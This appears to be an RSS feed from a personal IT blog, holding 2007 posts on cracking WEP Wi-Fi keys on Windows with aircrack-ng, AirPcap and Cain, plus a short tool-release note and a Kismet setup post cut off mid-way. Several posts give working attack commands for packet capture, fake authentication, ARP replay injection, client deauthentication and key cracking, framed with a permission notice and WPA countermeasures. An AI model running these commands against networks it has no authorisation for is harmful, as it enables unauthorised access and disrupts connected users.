<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mind Circus &#187; Wi-Fi</title>
	<atom:link href="http://www.twistedethics.com/category/wi-fi/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.twistedethics.com</link>
	<description>Inside the mind of a young IT Professional</description>
	<lastBuildDate>Wed, 18 Jan 2012 11:37:41 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Notes: Cracking WEP on the Windows command line with Aircrack-ng and AirPcap Tx</title>
		<link>http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/</link>
		<comments>http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/#comments</comments>
		<pubDate>Wed, 12 Sep 2007 18:37:34 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[airpcap]]></category>
		<category><![CDATA[airpcap tx]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[wep]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/</guid>
		<description><![CDATA[
Finally, I&#8217;ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn&#8217;t meant to be a guide or tutorial, it&#8217;s just my notes. Thanky  
Basics
Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.twistedethics.com/wp-content/uploads/2007/09/airpcap-arp-injection.png" alt="ARP injection in Windows using AirPcap Tx" /></p>
<p>Finally, I&#8217;ve had time to write down my notes on using aircrack-ng with the <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">Airpcap Tx adapter</a> in Windows. Before you read on, please be aware that this isn&#8217;t meant to be a guide or tutorial, it&#8217;s <strong>just my notes</strong>. Thanky <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<h3>Basics</h3>
<p>Start capturing:</p>
<p><code></p>
<pre>airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile</pre>
<p></code></p>
<p>Fake auth:</p>
<p><code></p>
<pre>aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00</pre>
<p></code></p>
<p>Start attack:</p>
<p><code></p>
<pre>aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00</pre>
<p></code></p>
<p>Deauth (if we need ARPs):</p>
<p><span style="font-family: 'Courier New'; line-height: 18px; white-space: pre;">aireplay-ng &#8211;deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00</span></p>
<p>Start cracking:</p>
<p><code></p>
<pre>aircrack-ng -z mycapturefile.cap</pre>
<p></code></p>
<p>Worked example:</p>
<pre><code>airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap</code></pre>
<h3>Download</h3>
<p>I&#8217;ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests,  appears to perform better.<br />
<a title="aircrack-ng release 0.9" href="http://www.twistedethics.com/wp-content/uploads/2007/09/aircrack-ng-09-twistedethicscom-edition.zip"><br />
<strong>Download the release of aircrack-ng for AirPcap Tx</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/09/12/notes-cracking-wep-with-aircrack-ng-and-airpcap-tx/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cracking WEP with aircrack-ptw in Windows with AirPcap and Cain</title>
		<link>http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/</link>
		<comments>http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/#comments</comments>
		<pubDate>Mon, 11 Jun 2007 13:22:31 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/</guid>
		<description><![CDATA[
Every time you deploy a WEP Access Point, a fluffy kitty dies.
Primer
Recently a team of German cryptography researchers perfected methods to recover a WEP key faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a [...]]]></description>
			<content:encoded><![CDATA[<div class="highlight">
<p><strong>Every time you deploy a WEP Access Point, a fluffy kitty dies.</strong></div>
<h3>Primer</h3>
<p>Recently a team of German cryptography researchers <a href="http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/">perfected methods to recover a WEP key</a> faster than ever before. The older Weak IV attacks generally needed between 500,000 and 2,000,000 packets to recover a 128-bit WEP key. In contrast, the new PTW method needs a mere 85,000 packets to have a 95% chance of recovering the WEP key.</p>
<p>Unlike the Weak IV attack, instead of collecting weak IVs, the PTW method collects ARP requests and responses to attack the encryption. ARP requests can either be collected naturally, or can be generated via packet injection. Until recently, packet injection was only possible in Linux. With the advent of the <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap USB adapter</a>, and some unsupported beta drivers, it&#8217;s possible to inject packets in Windows. <em>Update:</em> CACE have released AirPcap Tx, which features fully supported packet injection, for an added premium.</p>
<p>In this tutorial, I&#8217;ll guide you through the process of recovering a WEP key, via the PTW attack, in Windows. For this you&#8217;ll be using the AirPcap USB adapter, Cain, aircrack-ptw, and the aircrack-ng suite.</p>
<p><object id="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="500px" height="175px" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="quality" value="high" /><param name="bgcolor" value="#FFFFFF" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://ws.amazon.co.uk/widgets/q?ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8010%2Fcccd45be-edcd-4422-a559-d4a7ab1be4d0&amp;Operation=GetDisplayTemplate" /><param name="name" value="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" /><param name="align" value="middle" /><embed id="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" type="application/x-shockwave-flash" width="500px" height="175px" src="http://ws.amazon.co.uk/widgets/q?ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8010%2Fcccd45be-edcd-4422-a559-d4a7ab1be4d0&amp;Operation=GetDisplayTemplate" align="middle" name="Player_cccd45be-edcd-4422-a559-d4a7ab1be4d0" allowscriptaccess="always" bgcolor="#FFFFFF" quality="high"></embed></object></p>
<p><noscript><a href="http://ws.amazon.co.uk/widgets/q?ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8010%2Fcccd45be-edcd-4422-a559-d4a7ab1be4d0&amp;Operation=NoScript">Amazon.co.uk Widgets</a></noscript></p>
<h3>Legalities</h3>
<p>It&#8217;s important to point out that these methods should only be applied with permission from the owner of the target AP. You should either be auditing, penetration testing, or demonstrating the weaknesses of WEP in a Test Lab environment. You should not be using these methods to get &#8220;Free internet&#8221;!</p>
<h3>Preparation</h3>
<p>You&#8217;ll need:</p>
<ul>
<li>An AP configured with WEP</li>
<li>At least one client associated with the Access Point (to give us an initial ARP request)</li>
<li>A standard <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap Adapter</a> with the unsupported <a href="http://rapidshare.com/files/29501895/setup_airpcap_2_0_beta_tx.exe.html">beta packet injection driver</a> <strong>or</strong> a fully-supported <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap Tx</a>.</li>
<li><a href="http://www.oxid.it/cain.html">Cain and Abel</a></li>
<li><a href="http://www.twistedethics.com/wp-content/uploads/2007/05/aircrack-ng-0_7_0_beta1-airpcap.zip">aircrack-ng for AirPcap</a></li>
<li><a href="http://files.tuto-fr.com/aircrack-ptw_win32.rar">aircrack-ptw for Windows</a></li>
</ul>
<p>Now you&#8217;ll need to prepare the environment:</p>
<ul>
<li>Install the beta drivers (or if you have AirPcap Tx, install the drivers from the CD-ROM)</li>
<li>Plug in the AirPcap</li>
<li>Install Cain</li>
<li>Extract aircrack-ng to c:\airpcap\</li>
<li>Extract aircrack-ptw to c:\airpcap\</li>
<li>Move aircrack-ptw.exe to the bin folder (this is no longer required &#8211; <a href="#ptw-notes">see my notes</a>)</li>
<li>Optional: To make things easier, move the contents of the bin folder to c:\airpcap\. You&#8217;ll then be able to run aircrack-ptw.exe with just c:\airpcap\aircrack-ptw.exe mycapture.cap</li>
</ul>
<h3>Let&#8217;s get cracking</h3>
<p>I added narration to the video this evening at 20:36. It&#8217;s my first attempt at narration, and a little noisy, but I&#8217;m sure things will improve as time goes on! <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong></strong></p>
<p><a href="http://www.youtube.com/watch?v=6PjDyJqA6hY">Youtube Video Link</a></p>
<h3>Countermeasures</h3>
<p>The primary counter measure to this WEP attack is to cease using WEP and switch your Access Points to WPA encryption. As you&#8217;ve seen in this video, WEP is just too easy to crack. For further reading, Wikipedia has an excellent entry on <a href="http://en.wikipedia.org/wiki/WPA2">WPA</a>.</p>
<p>Access Points are so cheap now that, if your AP doesn&#8217;t support WPA via a firmware upgrade, you can easily afford a new one with full WPA or WPA2 support.</p>
<h3 id="ptw-notes">Notes</h3>
<p>Note 1: After recording this tutorial, I&#8217;ve become aware that, as of version 0.9,  aircrack-ng.exe natively supports the PTW attack by using the -z switch. For example: <kbd>aircrack-ng.exe -z mycapturefile.cap</kbd>. If you want to use this attack, download <a href="http://www.aircrack-ng.org/doku.php#download">aircrack-ng from the authors</a>, and replace aircrack-ng.exe in c:\airpcap with the new one.</p>
<p>Note 2: The whole process from starting capture to recovering the WEP key takes about 10 minutes.</p>
<p>Note 3: It is important that you get the Packet Injection drivers and the aircrack-ng release specifically for the AirPcap adapter, or this will not work.</p>
<p>Note 4: Just to summarise the steps in the video:</p>
<ol>
<li>Run Cain and passively scan for the target AP, making a note of the Channel number.</li>
<li>Using the channel number, tell AirPcap to inject packets once it has collected an ARP request. (You can sometimes force an ARP by sending Deauth. To do that, right click on the client. Otherwise, repair the Wireless connection on the client connected to the AP)</li>
<li>To use the PTW attack, you need to collect all packets. By running airodump-ng you can collect all the packets generated by Cain. The reason we use airodump-ng instead of Cain, is that Cain only collects WEP IVs.</li>
<li>Once you&#8217;ve collected enough packets, run aircrack-ptw against the capture file.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/feed/</wfw:commentRss>
		<slash:comments>49</slash:comments>
	<enclosure url="http://www.twistedethics.com/assets/aircrack-ptw-sound.flv" length="1" type="video/x-flv"/>
	</item>
		<item>
		<title>Aircrack-PTW for Windows</title>
		<link>http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/</link>
		<comments>http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/#comments</comments>
		<pubDate>Mon, 11 Jun 2007 11:09:55 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/</guid>
		<description><![CDATA[
Update
As of version 0.9, the aircrack-ng suite natively supports the PTW attack. Download it here. To invoke the PTW attack in aircrack-ng, run it with the -z switch: aircrack-ng.exe -z mycapturefile.cap.
A French chap has compiled Aircrack-PTW for Windows. This is great for anyone using the AirPcap adapter to inject packets in Windows, as the new [...]]]></description>
			<content:encoded><![CDATA[<div class="highlight">
<strong>Update</strong></p>
<p>As of version 0.9, the aircrack-ng suite natively supports the PTW attack. <a href="http://www.aircrack-ng.org/doku.php#download">Download it here</a>. To invoke the PTW attack in aircrack-ng, run it with the -z switch: <kbd>aircrack-ng.exe -z mycapturefile.cap</kbd>.</div>
<p>A French chap has compiled Aircrack-PTW for Windows. This is great for anyone using the AirPcap adapter to inject packets in Windows, as the new PTW attack dramatically reduces the amount of packets you need to collect before attempting to crack the WEP key. Notice in the screenshot below, only 83,000 packets were needed to break a 128bit key; as opposed to around 400,000 with the KoreK attack.</p>
<p><a href="http://www.twistedethics.com/wp-content/uploads/2007/06/2007-06-11_113648.png" title="aircrack-ptw on Windows"><img src="http://www.twistedethics.com/wp-content/uploads/2007/06/2007-06-11_113648.thumbnail.png" alt="aircrack-ptw on Windows" /></a></p>
<p>The executable is in French but it&#8217;s still perfectly usable; All you&#8217;re looking for is the WEP key!</p>
<p>Just run it with:</p>
<p><kbd>aircrack-ptw.exe yourcapturefile.cap</kbd></p>
<p>When I get some time I&#8217;ll try to compile a version in English, but for now you can grab the French version: <a href="http://files.tuto-fr.com/aircrack-ptw_win32.rar">Download Aircrack-PTW for Windows. </a></p>
<p>I&#8217;m in the process of writing up and recording a demonstration of cracking WEP in Windows with AirPcap, Cain, and aircrack-ptw. <strike>Expect to see something within a week!</strike> Update: <a href="http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/">Check it out here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/06/11/aircrack-ptw-for-windows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cracking WEP with AirPcap and Cain and Abel</title>
		<link>http://www.twistedethics.com/2007/05/26/cracking-wep-with-airpcap-and-cain-and-abel/</link>
		<comments>http://www.twistedethics.com/2007/05/26/cracking-wep-with-airpcap-and-cain-and-abel/#comments</comments>
		<pubDate>Sat, 26 May 2007 21:15:22 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/05/26/cracking-wep-with-airpcap-and-cain-and-abel/</guid>
		<description><![CDATA[This video tutorial demonstrates how to crack WEP in Windows using AirPcap and Cain and Abel.
Preparation
You&#8217;ll need:

An AirPcap Tx adapter
Cain and Abel

Note: It is possible to get this working by using the cheaper &#8220;Classic&#8221; AirPcap, in conjunction with the old 2.0 Beta Tx Drivers for AirPcap, to enable packet injection capability, but this is entirely [...]]]></description>
			<content:encoded><![CDATA[<p>This video tutorial demonstrates how to crack WEP in Windows using AirPcap and Cain and Abel.</p>
<h3>Preparation</h3>
<p>You&#8217;ll need:</p>
<ul>
<li>An <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap Tx adapter</a></li>
<li><a href="http://www.oxid.it/cain.html">Cain and Abel</a></li>
</ul>
<p>Note: It is possible to get this working by using the cheaper &#8220;Classic&#8221; AirPcap, in conjunction with the old <a href="http://rapidshare.com/files/29501895/setup_airpcap_2_0_beta_tx.exe.html">2.0 Beta Tx Drivers for AirPcap</a>, to enable packet injection capability, but this is entirely unsupported, and is not guaranteed to work. <acronym title="Your Mileage May Vary">YMMV</acronym>.</p>
<h3>Notes</h3>
<ul>
<li>To begin ARP injections, AirPcap must capture at least 1 ARP request from a system on the target AP. You can usually force this by sending a Deauth to a connected client.</li>
<li>Make sure you have over 250,000 IVs before attempting to crack the WEP key.</li>
<li>In my tests, the old AirPcap (silver-grey) appears to perform significantly faster than the new <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap</a> (dark-grey). I think it&#8217;s about 10x faster.</li>
</ul>
<h3>The Video</h3>
<p><strong></strong></p>
<p>Click Play to get things started.</p>
<h4>Additional</h4>
<p><a href="http://taz00.com/files/cain/cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv">Download the full resolution video</a> (Thanks to TAz00 from the <a href="http://oxid.netsons.org/phpBB2/">Oxid.it forums</a> for the hosting!)</p>
<p><a href="http://www.youtube.com/watch?v=GqleMWzSvUk">View the video on Youtube</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/05/26/cracking-wep-with-airpcap-and-cain-and-abel/feed/</wfw:commentRss>
		<slash:comments>42</slash:comments>
<enclosure url="http://taz00.com/files/cain/cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv" length="7149974" type="video/x-ms-wmv" />
<enclosure url="http://taz00.com/files/cain/cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv" length="7149974" type="video/x-ms-wmv" />
<enclosure url="http://taz00.com/files/cain/cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv" length="7149974" type="video/x-ms-wmv" />
<enclosure url="http://taz00.com/files/cain/cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv" length="7149974" type="video/x-ms-wmv" />
<enclosure url="http://taz00.com/files/cain/cracking-wep-with-airpcap-packet-injection-and-cain-and-abel.wmv" length="7149974" type="video/x-ms-wmv" />
	<enclosure url="http://www.twistedethics.com/assets/cracking-wep-with-airpcap-and-cain.flv" length="1" type="video/x-flv"/>
	</item>
		<item>
		<title>Chanalyzer 2.1 Released</title>
		<link>http://www.twistedethics.com/2007/05/11/chanalyzer-21-released/</link>
		<comments>http://www.twistedethics.com/2007/05/11/chanalyzer-21-released/#comments</comments>
		<pubDate>Fri, 11 May 2007 11:28:50 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Wi-Fi]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/05/11/chanalyzer-21-released/</guid>
		<description><![CDATA[The guys over at MetaGeek have just released version 2.1 of their Chanalyzer software for use with the Wi-Spy USB Spectrum Analyser.
Version 2.1 adds support for the upcoming Wi-Spy 2.4x, which incorporates an RPSMA connector for external antennas. Wi-Spy 2.4x ships with a standard &#8220;rubber duck&#8221; omni-directional antenna.
View the announcement on metageek.net
Download Chanalyzer 2.1
]]></description>
			<content:encoded><![CDATA[<p>The guys over at MetaGeek have just released version 2.1 of their Chanalyzer software for use with the Wi-Spy USB Spectrum Analyser.</p>
<p>Version 2.1 adds support for the upcoming Wi-Spy 2.4x, which incorporates an RPSMA connector for external antennas. Wi-Spy 2.4x ships with a standard &#8220;rubber duck&#8221; omni-directional antenna.</p>
<p><a href="http://metageek.net/News/e_43/Announcing____/2007/5/Chanalyzer_2_1_Unleashed.htm">View the announcement on metageek.net</a></p>
<p><a href="http://metageek.net/Products/Chanalyzer">Download Chanalyzer 2.1</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/05/11/chanalyzer-21-released/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to Crack WEP in Windows with Aircrack-ng and AirPcap</title>
		<link>http://www.twistedethics.com/2007/05/04/how-to-crack-wep-in-windows-with-aircrack-ng-and-airpcap/</link>
		<comments>http://www.twistedethics.com/2007/05/04/how-to-crack-wep-in-windows-with-aircrack-ng-and-airpcap/#comments</comments>
		<pubDate>Fri, 04 May 2007 18:09:56 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Wi-Fi]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/05/04/how-to-crack-wep-in-windows-with-aircrack-ng-and-airpcap/</guid>
		<description><![CDATA[This guide demonstrates how to crack WEP in Windows using the AirPcap Wireless Capture Adapter. 
To do this, you&#8217;ll need the useful AirPcap USB Wireless Capture Adapter from CACE Technologies. It&#8217;s pretty cheap when compared to some of the other Windows hardware solutions, and you&#8217;ll be supporting the makers of Wireshark!
Why Windows?
I adore Linux and [...]]]></description>
			<content:encoded><![CDATA[<p>This guide demonstrates how to crack WEP in Windows using the <a href="http://www.wireless-analysis.co.uk/#airpcap">AirPcap</a> Wireless Capture Adapter. <span id="more-68"></span></p>
<p>To do this, you&#8217;ll need the useful <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap USB Wireless Capture Adapter</a> from CACE Technologies. It&#8217;s pretty cheap when compared to some of the other Windows hardware solutions, and you&#8217;ll be supporting the makers of <a href="http://www.wireshark.org/">Wireshark</a>!</p>
<h2>Why Windows?</h2>
<p>I adore Linux and the entire Open Source movement, but it&#8217;s important to recognise that many people out there are locked into Windows; and learning an entirely new OS to perform security testing isn&#8217;t cost-effective for their company.</p>
<h2>How is WEP cracked?</h2>
<p><object id="Player_cb423402-c90c-4410-a7c1-d0768d0f11e3" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="300px" height="250px" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="http://ws.amazon.co.uk/widgets/q?rt=ss_ssw&amp;ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8003%2Fcb423402-c90c-4410-a7c1-d0768d0f11e3&amp;Operation=GetDisplayTemplate" /><param name="quality" value="high" /><param name="bgcolor" value="#FFFFFF" /><param name="allowscriptaccess" value="always" /><embed id="Player_cb423402-c90c-4410-a7c1-d0768d0f11e3" type="application/x-shockwave-flash" width="300px" height="250px" src="http://ws.amazon.co.uk/widgets/q?rt=ss_ssw&amp;ServiceVersion=20070822&amp;MarketPlace=GB&amp;ID=V20070822%2FGB%2Fmincir0e-21%2F8003%2Fcb423402-c90c-4410-a7c1-d0768d0f11e3&amp;Operation=GetDisplayTemplate" quality="high" bgcolor="#ffffff" name="Player_cb423402-c90c-4410-a7c1-d0768d0f11e3" allowscriptaccess="always" align="middle"></embed></object> <noscript>null</noscript><br />
To crack WEP, you need to exploit a weakness in its implementation, and collect lots of Initialisation Vectors (IVs). In normal WLAN traffic, it would take quite a while to pickup enough IVs &#8211; approximately 1 million &#8211; so we need to generate our own traffic. There&#8217;s two ways we could do this:</p>
<ol>
<li>Generate your own traffic using iperf.</li>
<li>Use packet injection using aireplay.</li>
</ol>
<p><span style="text-decoration: line-through;">At present, the AirPcap Drivers do not support packet injection in Windows. Fortunately, the makers of AirPcap, CACE Technologies, have said packet injection will be included soon. <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </span></p>
<p><strong>Update 2007-06-11:</strong> Packet Injection is now possible in Windows with the AirPcap. Please see my posts: <a href="http://www.twistedethics.com/2007/05/26/cracking-wep-with-airpcap-and-cain-and-abel/">Cracking WEP with Cain</a> and <a href="http://www.twistedethics.com/2007/06/11/cracking-wep-with-aircrack-ptw-in-windows-with-airpcap-and-cain/">Cracking WEP with aircrack-ptw</a> for more information.</p>
<h2>What will you need?</h2>
<ul>
<li>An <a title="View information about AirPcap" href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap Wireless Capture adapter</a>. This is a great little tool for 802.11 sniffing in Windows. You can even <a title="Run Kismet in Windows with AirPcap" href="http://www.twistedethics.com/2007/04/12/kismet-on-windows-without-a-drone/">run Kismet with it</a>!</li>
<li>The <a title="Aircrack-ng for AirPcap" href="http://www.twistedethics.com/wp-content/uploads/2007/05/aircrack-ng-0_7_0_beta1-airpcap.zip">Aircrack-ng for AirPcap</a> release by CACE Technologies.</li>
<li>Your own Wireless Access Point, configured with WEP.</li>
<li>3 computers, at least 1 of which should have a Wireless LAN Adapter.</li>
<li>Enough traffic to generate over 1 million IVs. For this demonstration, we&#8217;ll use a Windows release of iperf, called <a href="http://dast.nlanr.net/projects/Iperf2.0/kperf_setup.exe">K-perf</a>, to generate lots of traffic.</li>
</ul>
<h2>Let&#8217;s get cracking</h2>
<p>This guide assumes that you are performing this on a WLAN you have permission to use.</p>
<p>OK let&#8217;s do it&#8230;</p>
<h3>Set up Aircrack</h3>
<p>Plug in your <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap</a>.</p>
<p>Extract the contents of the aircrack-ng release to C:\aircrack (or wherever, I&#8217;m just doing this for tidiness).</p>
<p>Open up the c:\aircrack\bin\ directory and double-click the airodump-ng.exe (this is a specially built release tailored for AirPcap).</p>
<p>Configure it as per your settings [<a title="Configuring Airodump-ng" href="http://www.twistedethics.com/wp-content/uploads/2007/05/configure-airodump-ng.gif">Screenshot: Configuring Airodump-ng</a>]</p>
<h3>Generate some traffic</h3>
<p>Install <a href="http://dast.nlanr.net/projects/Iperf2.0/kperf_setup.exe">K-perf</a>, then run J-perf â€” the Java front-end â€” on the two machines connected to the AP. At least one should be connected via Wireless. Set one up as a server, and the other as a client. Remember, we&#8217;re just doing this to generate enough traffic on our demo WLAN.</p>
<p>On the Server, choose the &#8216;Server&#8217; option, then click Run. [<a title="Server: Configure K-perf using the Java front-end, J-perf." href="http://www.twistedethics.com/wp-content/uploads/2007/05/jperf-server.png">Screenshot: Server, Configure K-perf using the Java front-end, J-perf.</a>]</p>
<p>On the Client, type in the Server&#8217;s IP address, configure the time iperf should run to 1200, and click Run. [<a title="Client: Configure K-perf" href="http://www.twistedethics.com/wp-content/uploads/2007/05/jperf-client.png">Screenshot: Client, Configure K-perf</a>]</p>
<h3>Capture and Crack</h3>
<p>Go back to your AirPcap machine and watch the IV frames come in. [<a title="Airodump-ng capturing WEP IVs" href="http://www.twistedethics.com/wp-content/uploads/2007/05/airodump-capturing-packets.gif">Screenshot: Airodump-ng capturing WEP IVs</a>]</p>
<p>When you&#8217;ve hit over 1,000,000 frames, open up aircrack-ng_GUI.exe in the c:\aircrack\bin\ directory.</p>
<p>Click the Aircrack-ng tab, and locate your crackme.iv file.</p>
<p>Click launch and wait for the cracker to find your WEP key. [<a title="Airocrack-ng cracking WEP" href="http://www.twistedethics.com/wp-content/uploads/2007/05/airocrack-cracking-wep-in-windows.gif">Screenshot: Airocrack-ng cracking WEP</a>]</p>
<p>If aircrack cannot find your WEP key, you may not have enough IVs. To get more IVs, start up airodump-ng.exe again, and when asked the Output filename prefix, give the same name as you did previously. Airodump-ng will then append packets to the original dump.</p>
<h2>What next?</h2>
<h3>Traffic capture</h3>
<p>As this is a simulation, now that you have your WEP key, you can continue your penetration testing by using <a href="http://www.crownhill.co.uk/product.php?prod=1779&amp;ref=wireless-analysis">AirPcap</a> with Wireshark to <a href="http://www.twistedethics.com/2007/04/14/decrypting-wpa-with-airpcap-in-windows/">capture all the traffic</a> flowing over your WPA or WEP-enabled WLAN.</p>
<h3>Educate!</h3>
<p>As one of the aims of my blog is to help people, if you have friends/neighbours/co-workers whose WLANs are WEP enabled, you could demonstrate how easy it is to crack WEP, and then help them set up a properly-implemented WPA/WPA2 WLAN <img src='http://www.twistedethics.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Did this help you at all? Any questions? Feel free to leave me a comment below!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.twistedethics.com/2007/05/04/how-to-crack-wep-in-windows-with-aircrack-ng-and-airpcap/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>How to: Setup Kismet in Ubuntu 7.04</title>
		<link>http://www.twistedethics.com/2007/04/25/how-to-setup-kismet-in-ubuntu-704/</link>
		<comments>http://www.twistedethics.com/2007/04/25/how-to-setup-kismet-in-ubuntu-704/#comments</comments>
		<pubDate>Wed, 25 Apr 2007 18:26:46 +0000</pubDate>
		<dc:creator>Phil Wiffen</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Wi-Fi]]></category>

		<guid isPermaLink="false">http://www.twistedethics.com/2007/04/25/how-to-setup-kismet-in-ubuntu-704/</guid>
		<description><![CDATA[Here&#8217;s how I got Kismet running on Ubuntu on my Asus W3V laptop.

Open up a Terminal: Applications &#62; Accessories &#62; Terminal
sudo apt-get install kismet
sudo gedit /etc/kismet/kismet.conf
 Change
source=none,none,addme
to
source=ipw2200,eth1,wifi

